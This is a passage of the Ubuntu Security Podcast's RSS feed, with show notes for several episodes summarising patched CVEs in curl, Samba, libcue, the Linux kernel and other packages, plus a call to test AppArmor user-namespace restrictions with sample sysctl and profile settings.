<li><a href="https://ubuntu.com/security/CVE-2023-42753">CVE-2023-42753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42752">CVE-2023-42752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4273">CVE-2023-4273</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4244">CVE-2023-4244</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4194">CVE-2023-4194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4155">CVE-2023-4155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4132">CVE-2023-4132</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3866">CVE-2023-3866</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3865">CVE-2023-3865</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3863">CVE-2023-3863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38432">CVE-2023-38432</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34319">CVE-2023-34319</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3338">CVE-2023-3338</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2156">CVE-2023-2156</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20569">CVE-2023-20569</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1206">CVE-2023-1206</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 intel iotg</li>
</ul>
<h3 id="usn-6446-1-usn-6446-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6446-1">USN-6446-1</a>, <a href="https://ubuntu.com/security/notices/USN-6446-2">USN-6446-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5197">CVE-2023-5197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4921">CVE-2023-4921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4881">CVE-2023-4881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4623">CVE-2023-4623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4622">CVE-2023-4622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42756">CVE-2023-42756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42755">CVE-2023-42755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42753">CVE-2023-42753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42752">CVE-2023-42752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4244">CVE-2023-4244</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34319">CVE-2023-34319</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 gkeop, nvidia, ibm, raspi, gcp, gke, kvm, oracle, aws, azure, azure-fde</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="preparation-for-riga-product-roadmap-sprint-ubuntu-summit-and-engineering-sprint--17-33">Preparation for Riga Product Roadmap Sprint, Ubuntu Summit and Engineering Sprint (17:33)</h3>
<ul>
<li>Ubuntu Summit
<ul>
<li><a href="https://events.canonical.com/event/31/">https://events.canonical.com/event/31/</a></li>
<li>Mark Esler will be presenting &ldquo;Improving FOSS Security&rdquo; - designed for FOSS
maintainers who want to be proactive about security and protecting their
users</li>
<li>Tobias Heider will be presenting with Hector Martin on Asahi Linux and in
particular Ubuntu Asahi - community project to bring the Asahi Linux work to
Ubuntu (also was a great shout-out from Joe Ressington on the most recent
<a href="https://latenightlinux.com/late-night-linux-episode-252/">Late Night Linux</a> plus a good write-up on <a href="https://www.omgubuntu.co.uk/2023/10/ubuntu-ashai-for-apple-silicon">omgubuntu</a>)</li>
</ul>
</li>
</ul>
<h3 id="goodbye-and-good-luck-to-david-lane--21-31">Goodbye and good luck to David Lane (21:31)</h3>
<ul>
<li>Led the snap store reviewers work - much more streamlined process for folks
interacting on the snapcraft forum</li>
<li>Great manager + engineer and a great friend</li>
<li>See you at b-sides cbr in 2024</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E212.mp3" length="23384181" type="audio/mpeg" /><itunes:duration>1386</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 211
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-211/</link>
          <pubDate>Fri, 20 Oct 2023 17:14:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>f653144f20f17ab414cfff3ff2a4720c567372bb9cff5a9de6250678afbb0ef04d1c7121e9c15e8712bfac54a09930ac3ca19836992ce125aa558d854c87898f</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 211</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          After a well-deserved break, we're back looking at the recent Ubuntu 23.10
  release and the significant security technologies it introduces along with a
  call for testing of unprivileged user namespace restrictions, plus the details
  of...
        
        ]]></itunes:subtitle>
        <itunes:summary>  After a well-deserved break, we're back looking at the recent Ubuntu 23.10
  release and the significant security technologies it introduces along with a
  call for testing of unprivileged user namespace restrictions, plus the details
  of security updates for curl, Samba, iperf3, CUE and more.
  </itunes:summary>
        <description>  After a well-deserved break, we're back looking at the recent Ubuntu 23.10
  release and the significant security technologies it introduces along with a
  call for testing of unprivileged user namespace restrictions, plus the details
  of security updates for curl, Samba, iperf3, CUE and more.
  </description>
        <googleplay:description>  After a well-deserved break, we're back looking at the recent Ubuntu 23.10
  release and the significant security technologies it introduces along with a
  call for testing of unprivileged user namespace restrictions, plus the details
  of security updates for curl, Samba, iperf3, CUE and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>After a well-deserved break, we&rsquo;re is back looking at the recent Ubuntu 23.10
release and the significant security technologies it introduces along with a
call for testing of unprivileged user namespace restrictions, plus the details
of security updates for curl, Samba, iperf3, CUE and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>26 unique CVEs addressed</p>
<h3 id="usn-6429-2-usn-6429-3-curl-vulnerability--00-51">[<a href="https://ubuntu.com/security/notices/USN-6429-2">USN-6429-2</a>, <a href="https://ubuntu.com/security/notices/USN-6429-3">USN-6429-3</a>] curl vulnerability (00:51)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38546">CVE-2023-38546</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>for Ubuntu Pro users</li>
<li>under rare circumstances, possible that an application using libcurl would
potentially load cookies from a crafted file on disk - allowing a local
attacker to inject arbitrary cookies into a connection - although requires the
application to use the <code>curl_easy_duphandle()</code> function</li>
<li>2 CVEs addressed in Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38546">CVE-2023-38546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38545">CVE-2023-38545</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>cookie issue above, plus a possible heap buffer overflow when using a SOCKS5
proxy, if the specified hostname was longer than 255 bytes</li>
</ul>
<h3 id="usn-6425-3-samba-vulnerabilities--02-38">[<a href="https://ubuntu.com/security/notices/USN-6425-3">USN-6425-3</a>] Samba vulnerabilities (02:38)</h3>
<ul>
<li>4 CVEs addressed in Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-42670">CVE-2023-42670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42669">CVE-2023-42669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4154">CVE-2023-4154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4091">CVE-2023-4091</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various logic issues which could result in a range of effects, from attackers
being able to truncate read-only files, or cause Samba to stop responding and
hence DoS through to the ability to obtain all domain secrets</li>
</ul>
<h3 id="usn-6425-2-samba-regression--03-06">[<a href="https://ubuntu.com/security/notices/USN-6425-2">USN-6425-2</a>] Samba regression (03:06)</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-42670">CVE-2023-42670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42669">CVE-2023-42669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4154">CVE-2023-4154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4091">CVE-2023-4091</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Previous security update for focal was miscompiled and resulted in an issue
when handling the <code>%U</code> directive in smb.conf - if specified a path to be shared
like <code>/home/%U/FILES</code> the <code>%U</code> would seemingly be ignored and not replaced with
the username as expected - and hence the share would fail - this same issue
actually occurred previously in January this year - have now added a
regression test specifically to try and ensure we do not introduce this same
issue in the future again</li>
</ul>
<h3 id="usn-6430-1-ffmpeg-vulnerabilities--04-25">[<a href="https://ubuntu.com/security/notices/USN-6430-1">USN-6430-1</a>] FFmpeg vulnerabilities (04:25)</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28429">CVE-2021-28429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22051">CVE-2020-22051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22043">CVE-2020-22043</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22040">CVE-2020-22040</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22039">CVE-2020-22039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22024">CVE-2020-22024</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Most just memory leaks in handling of various crafted files -&gt; DoS</li>
<li>One heap buffer overflow  - possible RCE but likely just DoS</li>
<li>One integer overflow in FPS calculation</li>
</ul>
<h3 id="usn-6431-1-usn-6431-2-usn-6431-3-iperf3-vulnerabilities--05-12">[<a href="https://ubuntu.com/security/notices/USN-6431-1">USN-6431-1</a>, <a href="https://ubuntu.com/security/notices/USN-6431-2">USN-6431-2</a>, <a href="https://ubuntu.com/security/notices/USN-6431-3">USN-6431-3</a>] iperf3 vulnerabilities (05:12)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38403">CVE-2023-38403</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow -&gt; heap buffer overflow -&gt; RCE / crash - essentially, when
parsing a frame, would allocate memory for the frame, plus 1 extra byte for a
trailing NUL - if frame length was <code>MAX_UINT</code> adding 1 then wraps the integer
around back to zero - and so no memory gets allocated - and when copying into
the subsequent memory get a buffer overflow</li>
<li>When preparing this update, Jorge discovered he could cause the iperf3 server
to hang indefinitely on crafted input as well - reported this upstream and
included that fix here as well</li>
</ul>
<h3 id="usn-6432-1-quagga-vulnerabilities--06-26">[<a href="https://ubuntu.com/security/notices/USN-6432-1">USN-6432-1</a>] Quagga vulnerabilities (06:26)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-41360">CVE-2023-41360</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-41358">CVE-2023-41358</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different DoS vulns - both OOB reads on crafted input -&gt; crash</li>
</ul>
<h3 id="usn-6436-1-frr-vulnerabilities--06-38">[<a href="https://ubuntu.com/security/notices/USN-6436-1">USN-6436-1</a>] FRR vulnerabilities (06:38)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-41909">CVE-2023-41909</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-41360">CVE-2023-41360</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-41358">CVE-2023-41358</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>FRR is the new Quagga</li>
</ul>
<h3 id="usn-6394-2-python-vulnerability--06-52">[<a href="https://ubuntu.com/security/notices/USN-6394-2">USN-6394-2</a>] Python vulnerability (06:52)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48560">CVE-2022-48560</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible UAF in heapq module (aka priority queue implementation)</li>
</ul>
<h3 id="usn-6423-2-cue-vulnerability--07-04">[<a href="https://ubuntu.com/security/notices/USN-6423-2">USN-6423-2</a>] CUE vulnerability (07:04)</h3>
<ul>
<li>1 CVEs addressed in Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-43641">CVE-2023-43641</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB write discovered by <a href="https://github.blog/2023-10-09-coordinated-disclosure-1-click-rce-on-gnome-cve-2023-43641/">Kevin Backhouse from Github</a> - allows for a one-click
RCE on GNOME desktop due to the use of libcue by tracker - when a crafted CUE
file is downloaded, will get automatically indexed by tracker and hence parsed
by libcue triggering this bug -&gt; RCE</li>
<li>Interestingly, tracker employed a seccomp sandbox which should have limited
the impact for this kind of issue (ie restricting what the exploit could do)
but Kevin found a way to bypass this since the seccomp filter was only applied
to the thread used to parse the file - not the main thread - so Kevin could
simply delegate the code execution to the main thread to bypass this</li>
<li><a href="https://blogs.gnome.org/carlosg/2023/10/10/on-cve-2023-43641/">Upstream GNOME developers</a> were already aware of this as a possible weakness in
the sandbox, and so worked to ensure this is then applied to all threads
within tracker, not just the one spawned to parse the particular file</li>
</ul>
<h3 id="usn-6433-1-ghostscript-vulnerability--10-18">[<a href="https://ubuntu.com/security/notices/USN-6433-1">USN-6433-1</a>] Ghostscript vulnerability (10:18)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-43115">CVE-2023-43115</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible sandbox escape via a crafted PS document since it could modify the
specified IJS server parameter binary to execute some other binary instead</li>
</ul>
<h3 id="usn-6396-3-linux-kernel--azure--vulnerabilities--10-55">[<a href="https://ubuntu.com/security/notices/USN-6396-3">USN-6396-3</a>] Linux kernel (Azure) vulnerabilities (10:55)</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4128">CVE-2023-4128</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-40283">CVE-2023-40283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3863">CVE-2023-3863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3212">CVE-2023-3212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various issues covered previously - 2 different UAFs - network packet
classifier and bluetooth subsystems, recent speculative execution vulns in AMD
and Intel processors and more</li>
</ul>
<h3 id="usn-6434-1-pmix-vulnerability--11-24">[<a href="https://ubuntu.com/security/notices/USN-6434-1">USN-6434-1</a>] PMIx vulnerability (11:24)</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-41915">CVE-2023-41915</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OpenPMIx implementiation - Process Management Interface Exascale Standard -
API used in HPC environments</li>
<li>Possible privilege escalation via race condition - library sets ownership of
various files but would follow symlinks when doing this - so if a user could
race it to swap a symlink out then could get it to set the ownership of a root
owned file to themselves and gain the ability to read it etc</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-23-dot-10--mantic-minotaur--released--12-41">Ubuntu 23.10 (Mantic Minotaur) Released (12:41)</h3>
<ul>
<li><a href="https://ubuntu.com/blog/canonical-releases-ubuntu-23-10-mantic-minotaur">https://ubuntu.com/blog/canonical-releases-ubuntu-23-10-mantic-minotaur</a></li>
<li>Culmination of the last 6 months of work - this release in particular has a
strong focus on raising the bar for security, and setting the stage for the
next LTS (24.04)</li>
<li>Two preview features - TPM-backed FDE on Ubuntu Desktop, and unprivileged user
namespace restrictions via AppArmor</li>
<li>Covered both of these in previous episodes
<ul>
<li><a href="/episode-208/#tpm-backed-full-disk-encryption-is-coming-to-ubuntu--10-48">TPM-backed Full Disk Encryption is coming to Ubuntu from Episode 208</a></li>
<li><a href="/episode-205/#unprivileged-user-namespace-restrictions-via-apparmor-in-ubuntu--17-00">Unprivileged user namespace restrictions via AppArmor in Ubuntu from Episode 205</a></li>
</ul>
</li>
</ul>
<h3 id="call-for-testing-of-unprivileged-user-namespace-restrictions-on-mantic">Call for testing of Unprivileged User Namespace Restrictions on Mantic</h3>
<ul>
<li>
<p>The hope is to get this enabled by default in 24.04 LTS - but we need as much
testing as we can get to find anything else which is not working as expected
beforehand - easy to do via a new <a href="https://manpages.ubuntu.com/manpages/jammy/en/man8/sysctl.8.html">sysctl</a></p>
<ul>
<li>Can either do it immediately:
<code>sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=1</code></li>
<li>Or can set this to be applied at boot via a new file in <code>/etc/sysctl.d</code>, e.g.:
create a file <code>/etc/sysctl.d/60-apparmor.conf</code> with the following contents:</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>kernel.apparmor_restrict_unprivileged_userns = 1
</span></span></code></pre></div></li>
<li>
<p>Then if you do find something which is not working as expected, you can create
a simple AppArmor profile which will allow it to use unprivileged user
namespaces without any additional restrictions, e.g:</p>
</li>
</ul>
<!-- raw HTML omitted -->
<pre tabindex="0"><code class="language-apparmor" data-lang="apparmor">abi &lt;abi/4.0&gt;,

include &lt;tunables/global&gt;

/opt/google/chrome/chrome flags=(unconfined) {
  userns,

  # Site-specific additions and overrides. See local/README for details.
  include if exists &lt;local/opt.google.chrome.chrome&gt;
}
</code></pre><ul>
<li>From a defensive security point of view, also is useful to enable an
additional sysctl to ensure that anything which is unconfined can&rsquo;t just abuse
these profiles by <code>aa-exec</code>&lsquo;ing themselves via that profile - so then also need
to enable the <code>kernel.apparmor_restrict_unprivileged_unconfined = 1</code> sysctl too</li>
<li>One application that we are aware of that is impacted is LXD - which, to avoid
issues, is currently disabling this automatically at startup - so for now you
have to keep manually re-enabling this restriction until the LXD devs land a
change to stop this <a href="https://github.com/canonical/lxd-pkg-snap/pull/187">https://github.com/canonical/lxd-pkg-snap/pull/187</a></li>
<li>Also all applications based on chromium (ie all electron apps) may likely have
issues since the chromium sandbox uses unprivileged user namespaces by
default - we have already created profiles for the various ones in the Ubuntu
archive that we are aware of, and for some third party ones too (Brave,
Vivaldi etc) but we expect there will be others - in that case, let us know</li>
<li>File a bug against apparmor: <code>ubuntu-bug apparmor</code> or visit
<a href="https://bugs.launchpad.net/ubuntu/+source/apparmor/+filebug">https://bugs.launchpad.net/ubuntu/+source/apparmor/+filebug</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E211.mp3" length="21020109" type="audio/mpeg" /><itunes:duration>1199</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 210
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-210/</link>
          <pubDate>Fri, 22 Sep 2023 12:39:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>2f29842942c9ee3000ad00007a2bdaa3315e95d912afceb84efbba06fc340630ea10a6acb8956848977109c47ce8aa6cc5683af50e1cac70ca44ce4a2124fec6</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 210</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          It's the Linux Security Summit in Bilbao this week and we bring you some
  highlights from our favourite talks, plus we cover the 25 most stubborn software
  weaknesses, and we look at security updates for Open VM Tools, libwebp, Django,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  It's the Linux Security Summit in Bilbao this week and we bring you some
  highlights from our favourite talks, plus we cover the 25 most stubborn software
  weaknesses, and we look at security updates for Open VM Tools, libwebp, Django,
  binutils, Indent, the Linux kernel and more.
  </itunes:summary>
        <description>  It's the Linux Security Summit in Bilbao this week and we bring you some
  highlights from our favourite talks, plus we cover the 25 most stubborn software
  weaknesses, and we look at security updates for Open VM Tools, libwebp, Django,
  binutils, Indent, the Linux kernel and more.
  </description>
        <googleplay:description>  It's the Linux Security Summit in Bilbao this week and we bring you some
  highlights from our favourite talks, plus we cover the 25 most stubborn software
  weaknesses, and we look at security updates for Open VM Tools, libwebp, Django,
  binutils, Indent, the Linux kernel and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>It&rsquo;s the Linux Security Summit in Bilbao this week and we bring you some
highlights from our favourite talks, plus we cover the 25 most stubborn software
weaknesses, and we look at security updates for Open VM Tools, libwebp, Django,
binutils, Indent, the Linux kernel and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>88 unique CVEs addressed</p>
<h3 id="usn-6365-1-open-vm-tools-vulnerability--00-45">[<a href="https://ubuntu.com/security/notices/USN-6365-1">USN-6365-1</a>] Open VM Tools vulnerability (00:45)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-20900">CVE-2023-20900</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly validate SAML tokens - uses the xmlsec library but when
verifying the signature on a SAML document, failed to configure the library to
only use the X509 certificate for validation - since presumably an attacker
could intercept the SAML token, and replace the X509 cert with a different
type of signature which would then be trusted by the xmlsec library and allow
the attacker to gain access</li>
</ul>
<h3 id="usn-6366-1-postgresql-vulnerability--01-34">[<a href="https://ubuntu.com/security/notices/USN-6366-1">USN-6366-1</a>] PostgreSQL vulnerability (01:34)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-39417">CVE-2023-39417</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Fixed for other releases in <a href="/episode-206/#usn-6296-1-postgresql-vulnerabilities--06-44">[USN-6296-1] PostgreSQL vulnerabilities in Episode
206</a> - one issue, which allowed an attacker to escalate their privileges
(from <code>CREATE</code> to being able to execute arbitrary code as a bootstrap superuser)
also affected PostgreSQL 9.5 in Ubuntu 16.04</li>
</ul>
<h3 id="usn-6364-1-ghostscript-vulnerabilities--01-59">[<a href="https://ubuntu.com/security/notices/USN-6364-1">USN-6364-1</a>] Ghostscript vulnerabilities (01:59)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-21890">CVE-2020-21890</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21710">CVE-2020-21710</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Divide by zero and buffer overflow in handling of PDFs -&gt; DoS / RCE?</li>
</ul>
<h3 id="usn-6369-1-libwebp-vulnerability--02-19">[<a href="https://ubuntu.com/security/notices/USN-6369-1">USN-6369-1</a>] libwebp vulnerability (02:19)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4863">CVE-2023-4863</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>heap buffer overflow -&gt; OOB write -&gt; RCE</li>
<li>originally reported as a vuln in Chrome on 12 September - full impact that
this was actually a bug in libwebp became clear a few days later
<ul>
<li>Solar Designer has a good thread on the details on <a href="https://marc.info/?i=20230921205250.GA13106@openwall.com">oss-security</a></li>
</ul>
</li>
</ul>
<h3 id="usn-6367-1-firefox-vulnerability--03-55">[<a href="https://ubuntu.com/security/notices/USN-6367-1">USN-6367-1</a>] Firefox vulnerability (03:55)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4863">CVE-2023-4863</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>117.0.1 for the libwebp fix above</li>
</ul>
<h3 id="usn-6368-1-thunderbird-vulnerabilities--04-04">[<a href="https://ubuntu.com/security/notices/USN-6368-1">USN-6368-1</a>] Thunderbird vulnerabilities (04:04)</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4863">CVE-2023-4863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4584">CVE-2023-4584</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4581">CVE-2023-4581</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4575">CVE-2023-4575</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4574">CVE-2023-4574</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4573">CVE-2023-4573</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>102.15.1 - libwebp issue above plus various other issues - various UAFs,
missing <code>.xll</code> files from standard blocklist that warns users when downloading
executables - more of a windows issue but these are Excel add-in files -
ie. plugins for Excel, &ldquo;memory safety bugs&rdquo;</li>
</ul>
<h3 id="usn-6370-1-modsecurity-vulnerabilities--04-42">[<a href="https://ubuntu.com/security/notices/USN-6370-1">USN-6370-1</a>] ModSecurity vulnerabilities (04:42)</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
